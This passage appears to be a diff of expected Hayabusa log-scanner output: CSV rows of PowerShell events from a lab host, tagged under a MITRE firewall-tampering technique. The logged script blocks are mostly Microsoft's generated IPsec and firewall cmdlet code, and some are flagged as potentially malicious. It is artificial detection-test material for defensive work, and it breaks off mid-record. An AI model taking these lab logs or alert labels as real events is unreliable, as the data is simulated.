($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query 